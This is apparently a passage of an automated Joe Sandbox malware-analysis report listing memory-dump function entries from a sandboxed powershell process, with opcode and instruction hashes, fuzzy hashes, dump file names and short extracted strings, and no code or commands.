                                                                    • Instruction Fuzzy Hash: 28F01D35A00518AFCB14DF8CD9409EEF7B2FF8C320B248159E919B72A1CB329D52DB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 32e7726ad063f19834ee1e625bfc68aa9ceeec71205b5c8088ae6f3a3771c644
                                                                    • Instruction ID: 57b12d90d105c5ce0ebc4aa85ace94bb0fc355ece4289752d80994d5781282d2
                                                                    • Opcode Fuzzy Hash: 32e7726ad063f19834ee1e625bfc68aa9ceeec71205b5c8088ae6f3a3771c644
                                                                    • Instruction Fuzzy Hash: A7F01D75A001149FCB05CB8CD890EBEF776FF88324F148158EA15A72A1C736AC52CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6accd1bddb45a5980b9adf5033d0506fbbb80f3182a8ae13cecf294d88f85adf
                                                                    • Instruction ID: 70a8e78ee2f41b3bc00f35c1a3f99b6d7f2ccf0f96575b3a1ae615d36eccc42a
                                                                    • Opcode Fuzzy Hash: 6accd1bddb45a5980b9adf5033d0506fbbb80f3182a8ae13cecf294d88f85adf
                                                                    • Instruction Fuzzy Hash: 33F06730A04219EFCB00DFE0D919BAEBFB5FB88342F200428E902AB251DA784841DF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eecefa52b7e72e967c3e511411346e09346ae8a5b310c9360623c68a3e2cf132
                                                                    • Instruction ID: 08fffcab87a8251e9b09d045231fe0588e06ba9d604f7df16c7c1b7a9e521c36
                                                                    • Opcode Fuzzy Hash: eecefa52b7e72e967c3e511411346e09346ae8a5b310c9360623c68a3e2cf132
                                                                    • Instruction Fuzzy Hash: 0CF0F931A04219EFCB00DFE4D919BAEBFB5AB58342F200429E506AB665DA744901DF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 06549920c3942affddae9fbac36759bfb0ce95075fe261bc0f3047df82eb65a8
                                                                    • Instruction ID: 95e7bd5b20c8a98753c3425825a5dc96f5a3e6c71f2f18d8ee0c1af9b0420bee
                                                                    • Opcode Fuzzy Hash: 06549920c3942affddae9fbac36759bfb0ce95075fe261bc0f3047df82eb65a8
                                                                    • Instruction Fuzzy Hash: 46E0687220A3269FCA208E2CB44009BB391FF4523C338E77EC5A5126D0CA30A882CB84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2000061915.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b865d05c04f65fed3169f671080ed1f26cb57583cc117cfd39e9a8662a54ec5
                                                                    • Instruction ID: 6de68db2105dbe972274265f762c3a9119bb2f7ab99c69da290b2a88483c893d
                                                                    • Opcode Fuzzy Hash: 9b865d05c04f65fed3169f671080ed1f26cb57583cc117cfd39e9a8662a54ec5
                                                                    • Instruction Fuzzy Hash: 11F0DA35A001059FCB15CF9CD890AEEF7B1FF88324F248159E515A72A1C736EC52CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2000061915.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 95f470e0a626d8a29cf77ed554988085fef6a14fcd04fdb776d1bdfb11918b3c
                                                                    • Instruction ID: 08d21149822c3d76796bff99cc5be69b58f0d8ed140ea868d0ef678ccac3f77b
                                                                    • Opcode Fuzzy Hash: 95f470e0a626d8a29cf77ed554988085fef6a14fcd04fdb776d1bdfb11918b3c
                                                                    • Instruction Fuzzy Hash: 4AF0A974E0020A8FC780DF68D485AAEBBF4FF49314F505199E509DB321E730A941CBD1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fa3303bf40c284c2906270dbba285ae889753dacb5d23d57ce134666ef56fb7c
                                                                    • Instruction ID: cd84202f43fa5f62aa32fc5a86fe78de3e94a95d0230a76054cc83c6c401008d
                                                                    • Opcode Fuzzy Hash: fa3303bf40c284c2906270dbba285ae889753dacb5d23d57ce134666ef56fb7c
                                                                    • Instruction Fuzzy Hash: 50F027A86063819BCB149728C445447FBB2FFCB20570CD0C9D6490E253DA30A882C351
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bfa28ca545de4f348794fd5f424851eaa236d0578a98d3c5aebaef85490ba680
                                                                    • Instruction ID: 49a10fd03aca93deaee4af99018b625b2298937dc8bacbd355ccb593522252f3
                                                                    • Opcode Fuzzy Hash: bfa28ca545de4f348794fd5f424851eaa236d0578a98d3c5aebaef85490ba680
                                                                    • Instruction Fuzzy Hash: E9F0A030A0511AEFCB00DBD0D915BAEBB71BB48306F20401CE502AB745DB784D059B41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4fbf9894be73a4bc8b89f8c7c034788eaa7d782e3f7ec11699771dac1ca4c727
                                                                    • Instruction ID: 38938e58a4e9586116e57d2dc4af5f30d49a6ecfc945f9881cab788bec2d31c0
                                                                    • Opcode Fuzzy Hash: 4fbf9894be73a4bc8b89f8c7c034788eaa7d782e3f7ec11699771dac1ca4c727
                                                                    • Instruction Fuzzy Hash: B4E026B5F102199FCB40DBF8E4005ED7B72EF9E162B104629E45DD3220DA315C034B50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0dd2c6a90b2d318d306a5752ce13f4768331b32b85126b74063d3bc0f98c4003
                                                                    • Instruction ID: 918cec501df7eb7a43d639db07ab2655be07b479a45d131d33fa0294123f8b69
                                                                    • Opcode Fuzzy Hash: 0dd2c6a90b2d318d306a5752ce13f4768331b32b85126b74063d3bc0f98c4003
                                                                    • Instruction Fuzzy Hash: 96F0A030A04119EFCB00DBD0D915BAEBB71BB44306F20401CE502AB745DB784D059B51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 74559f89b351861089d278d7a1b9fb9be7091b22ba74890245ba3c72902c2883
                                                                    • Instruction ID: 5a1a5dd6e551971b5626119d0dbfa9e0883139231844dd1a19a1a26105f31582
                                                                    • Opcode Fuzzy Hash: 74559f89b351861089d278d7a1b9fb9be7091b22ba74890245ba3c72902c2883
                                                                    • Instruction Fuzzy Hash: 3BE022B86422D59BCF28EB64D4025A6FBA1AFCB20571CD08DD4884F513DA39E843D712
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 076f8d77001da6999438071dcb8052c250b6a1d834f4462a9a6eb8d7634f1615
                                                                    • Instruction ID: a16e18a8934a04cd5db6411aed9606857ffb7c6f08cfda4371236bf3add0c6cd
                                                                    • Opcode Fuzzy Hash: 076f8d77001da6999438071dcb8052c250b6a1d834f4462a9a6eb8d7634f1615
                                                                    • Instruction Fuzzy Hash: B4E09A70A1520EEFDB00DBD0DE16BAEBB74FB54307F20082CE502AB652DBB849049F51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9209884436090608def40c5e16b67d0f41b450257c5c1124bc7e678d40a67c10
                                                                    • Instruction ID: 5383c05eabfbff21dd8a1b7f5118df428e1d1f484eea33011f7363a3c570d629
                                                                    • Opcode Fuzzy Hash: 9209884436090608def40c5e16b67d0f41b450257c5c1124bc7e678d40a67c10
                                                                    • Instruction Fuzzy Hash: DFE09A70A1520AEFDB00DBD0DA16BAEBB74BB54306F20042CE502AB652DBB849049B51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9209884436090608def40c5e16b67d0f41b450257c5c1124bc7e678d40a67c10
                                                                    • Instruction ID: 5383c05eabfbff21dd8a1b7f5118df428e1d1f484eea33011f7363a3c570d629
                                                                    • Opcode Fuzzy Hash: 9209884436090608def40c5e16b67d0f41b450257c5c1124bc7e678d40a67c10
                                                                    • Instruction Fuzzy Hash: DFE09A70A1520AEFDB00DBD0DA16BAEBB74BB54306F20042CE502AB652DBB849049B51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b0ba31b98aba34b6ee849a000b471a21538c231bfbc099838f392e2012822c43
                                                                    • Instruction ID: f0d27730ab0f65da1a8a89b14590b21c53beef088310044e15961e791c37d08a
                                                                    • Opcode Fuzzy Hash: b0ba31b98aba34b6ee849a000b471a21538c231bfbc099838f392e2012822c43
                                                                    • Instruction Fuzzy Hash: 7AE08CB63091159FE644DA48E441961F362EBD6329328D0FACA0A4E662DB32D8A2CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 641a1db14b2a6a27a6559842ffecfba23a1144c92400b90e7fefbb45f900e467
                                                                    • Instruction ID: 8d64cf2992998c46a28ab8c21664368767770a013dfdb8e98e29eb8132422e0a
                                                                    • Opcode Fuzzy Hash: 641a1db14b2a6a27a6559842ffecfba23a1144c92400b90e7fefbb45f900e467
                                                                    • Instruction Fuzzy Hash: 63D05B3055511FDEDB10DBD4D51576FBFB0BB1438BF20092DD502A6711EF7445015A52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2000061915.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0ab25ab1af4272982a51f11bd5996a4a603b9242de37ffb527b710b445304940
                                                                    • Instruction ID: dc20057214a1d7c23e803fae19d240523676b646285bf74e3cfaf9a32f53e238
                                                                    • Opcode Fuzzy Hash: 0ab25ab1af4272982a51f11bd5996a4a603b9242de37ffb527b710b445304940
                                                                    • Instruction Fuzzy Hash: 6BD01779B001189FCB00CB88D890AEDF371FB8C325F10806AD918D3341CB32AC52CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cb5c48e9d94389687755d533ec153ec504b9b6aceddd36643de4f40765bc433f
                                                                    • Instruction ID: d7b6acbf3a0d96235028150d506fd5878b80c1fdf7189ecca36758ca6f412834
                                                                    • Opcode Fuzzy Hash: cb5c48e9d94389687755d533ec153ec504b9b6aceddd36643de4f40765bc433f
                                                                    • Instruction Fuzzy Hash: F9D0A75170451003D5C0327820317AE68421BA1A603D14959E501EF796DE575C4B4BEA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1999783757.0000000004E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E2D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4e2d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9608623e03de48dec22239d9de206fba90092be265965ed49c70f2336d8f82fe
                                                                    • Instruction ID: 2c57d3f3e526d9490947d44029cae1d9dbf01525f2f0cf12d439939de62dcbe9
                                                                    • Opcode Fuzzy Hash: 9608623e03de48dec22239d9de206fba90092be265965ed49c70f2336d8f82fe
                                                                    • Instruction Fuzzy Hash: 66213671604244DFCB05DF14CEC4F16BFA5FF98328F24C668EA094A206C33AE416DBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'dq$4'dq$84tl$84tl$84tl$84tl$tPdq$tPdq$tPdq$tPdq$$dq$(jq$(jq$(jq$(jq
                                                                    • API String ID: 0-610874285
                                                                    • Opcode ID: 2192ebfa0cbfad8e476711e9fb62cdb4dae1def0b4585ae8f1bf67f0afb757b5
                                                                    • Instruction ID: f2c8fd0b63e3f13fbb9c9ebc09afcf5f53046401bf6a65318abac4c9fa3b7419
                                                                    • Opcode Fuzzy Hash: 2192ebfa0cbfad8e476711e9fb62cdb4dae1def0b4585ae8f1bf67f0afb757b5
                                                                    • Instruction Fuzzy Hash: 03A109B17032159FCB24DF59E4016AABBE2AF89315F349469EC059B3A1DB31DD80C7B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl
                                                                    • API String ID: 0-3038533570
                                                                    • Opcode ID: 17eeef84e36a4ae07860e119c9fa8d821766eaf6b66b6d2694523c6bfc2a627d
                                                                    • Instruction ID: 560c5a4cd623e8a45002eda52007f2e6ec4da1e7c2a6e0415fb81a0386824d4d
                                                                    • Opcode Fuzzy Hash: 17eeef84e36a4ae07860e119c9fa8d821766eaf6b66b6d2694523c6bfc2a627d
                                                                    • Instruction Fuzzy Hash: CFC1B0F0E11215DBCB24CF64D541A6BBBF2AF88319F14D429D916ABB45CB32FC818B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 84tl$84tl$XRiq$XRiq$XRiq$tPdq$tPdq$$dq
                                                                    • API String ID: 0-2274212534
                                                                    • Opcode ID: 9390c7c21929b389b847d1ea48512a9a1b2f07820e5d5c94b9af578bb30de636
                                                                    • Instruction ID: 457021a60a0af66f248c21a445bba405219949e18d97672cf6b277a2a892f443
                                                                    • Opcode Fuzzy Hash: 9390c7c21929b389b847d1ea48512a9a1b2f07820e5d5c94b9af578bb30de636
                                                                    • Instruction Fuzzy Hash: 60612CB0B01105DFCB14DF6898406BABBF2AF89315F14C4A9E9159F281CF35DD81CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'dq$4'dq$tPdq$tPdq$$dq$$dq$$dq$$dq
                                                                    • API String ID: 0-4017470009
                                                                    • Opcode ID: a07188f340c37e486e90f597f9ed5480dd1e8119a6ed3005994bfa6a5d4274a6
                                                                    • Instruction ID: eb5d355be8f5fe531b1bac3f55e76f4bc2272614d465338a8d84279e68995d6d
                                                                    • Opcode Fuzzy Hash: a07188f340c37e486e90f597f9ed5480dd1e8119a6ed3005994bfa6a5d4274a6
                                                                    • Instruction Fuzzy Hash: CB5128B1B012959FCF248F55E8117AAB7E2EF86315F24D46AD8158F2C1CF31D981CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                                    • API String ID: 0-2331353128
                                                                    • Opcode ID: c83069b902b8eb8e30bbd120ee37bd3fae22758cd7e4c49f40b0d3cf2cf9a88e
                                                                    • Instruction ID: b2b869f5f060a772cc69563cb9a3857c263967554cd3f11696730880b0668ff9
                                                                    • Opcode Fuzzy Hash: c83069b902b8eb8e30bbd120ee37bd3fae22758cd7e4c49f40b0d3cf2cf9a88e
                                                                    • Instruction Fuzzy Hash: E93159F27573038BCB254A69B450277F7E2ABD1225B24D07FD8068B241CE31C5E5C351
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'dq$4'dq$$dq$$dq$$dq$$dq
                                                                    • API String ID: 0-547171449
                                                                    • Opcode ID: f247fa63e25edd60733f0db59f2f0f449e6cd7efb323b08736a74880cd487130
                                                                    • Instruction ID: 1844aeee997b9882ccc73030709376a2fb46b10170ae66309f55cef4dfc56997
                                                                    • Opcode Fuzzy Hash: f247fa63e25edd60733f0db59f2f0f449e6cd7efb323b08736a74880cd487130
                                                                    • Instruction Fuzzy Hash: 7111D3B071621A8FCB248F99B4106BA77E3BF85755729606EF8458F252CB24CCA1CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 84tl$84tl$tPdq$tPdq$$dq
                                                                    • API String ID: 0-3920325147
                                                                    • Opcode ID: 8b8dc441af2214bd0f90a4512eeb2fcbbf1c321b8f86c8a7b3df184fafb9743f
                                                                    • Instruction ID: 8973990fda4048afdbb6ba9ab011e8123ce0e717fb6646b61a02073e91e7b684
                                                                    • Opcode Fuzzy Hash: 8b8dc441af2214bd0f90a4512eeb2fcbbf1c321b8f86c8a7b3df184fafb9743f
                                                                    • Instruction Fuzzy Hash: 276109B17022059FCB249F68D4106BABBE2AF89315F24C06AE9059F2A1CF35DD91C7B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'dq$4'dq$$dq$$dq$$dq
                                                                    • API String ID: 0-2509493698
                                                                    • Opcode ID: ee834094af4caf0892ff27a01cfcbb01172bca76bba24e2be43b47fb92153410
                                                                    • Instruction ID: aa7a08015f5fe3d467dbe5bfd32bc7a85a4c753aa14b4562c6d4cec91c4301ce
                                                                    • Opcode Fuzzy Hash: ee834094af4caf0892ff27a01cfcbb01172bca76bba24e2be43b47fb92153410
                                                                    • Instruction Fuzzy Hash: A23129F6707316CFCF254E6AB4102BFB792AF89215B34A4ABD806871A1DE39C481C371
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'dq$4'dq$$dq$$dq$$dq
                                                                    • API String ID: 0-2509493698
                                                                    • Opcode ID: 3a73c8aafeee0ee2800c101a62d13cba0cf77e431d51efee4c83e1e02c9e0826
                                                                    • Instruction ID: f5932104a0e553f6605372cb37597b048ac3d79ef5da2efb1a925709d3b554ae
                                                                    • Opcode Fuzzy Hash: 3a73c8aafeee0ee2800c101a62d13cba0cf77e431d51efee4c83e1e02c9e0826
                                                                    • Instruction Fuzzy Hash: EB21FBB1701206CBCF394A65E4142AB7BA2DBC731AF24906AC80547240DF31C9A1C351
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $dq$$dq$$dq$ll$ll
                                                                    • API String ID: 0-334904597
                                                                    • Opcode ID: f8ec4657587b860a4f465dd7691cedb4b5b71f96266784b2035a546abdaeee2b
                                                                    • Instruction ID: b10150bb9e33f5a572c9cbb92c9cf98917536a52b68cfbb1c4ba4bf594a32dd9
                                                                    • Opcode Fuzzy Hash: f8ec4657587b860a4f465dd7691cedb4b5b71f96266784b2035a546abdaeee2b
                                                                    • Instruction Fuzzy Hash: 0C113BB13023069BEB34596AE801767B7B7EBC1765F24D4BEEA4987381EA31C5C1C391
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fvl$(fvl$(fvl$(fvl
                                                                    • API String ID: 0-993764349
                                                                    • Opcode ID: 7810caa6f7da393da32abc7f0c6e212018ecc9a430cac9fb24761f1046dc1c5a
                                                                    • Instruction ID: 0cdd32c755de024754738b9b55ffd056a5390a988ba5f4eecb32af9eddbd37e1
                                                                    • Opcode Fuzzy Hash: 7810caa6f7da393da32abc7f0c6e212018ecc9a430cac9fb24761f1046dc1c5a
                                                                    • Instruction Fuzzy Hash: 0CA190B0A02601DFCB24CF54D441AABFBF2BF85318F14D56AD9566B746C732B881CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fvl$(fvl$(fvl$(fvl
                                                                    • API String ID: 0-993764349
                                                                    • Opcode ID: 3273f2513a2d8bd298e66551e1adebaddb33e52f95b8a1cf42c239513b065293
                                                                    • Instruction ID: ea3d27e979d613f93bb9c7c3a16f1a7e4962a571548734d39ffc88ee3d030163
                                                                    • Opcode Fuzzy Hash: 3273f2513a2d8bd298e66551e1adebaddb33e52f95b8a1cf42c239513b065293
                                                                    • Instruction Fuzzy Hash: B871BFF0A41205DFDB14DF68D541AAABBB2AF88324F14D079D815AF754CB32EC81CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
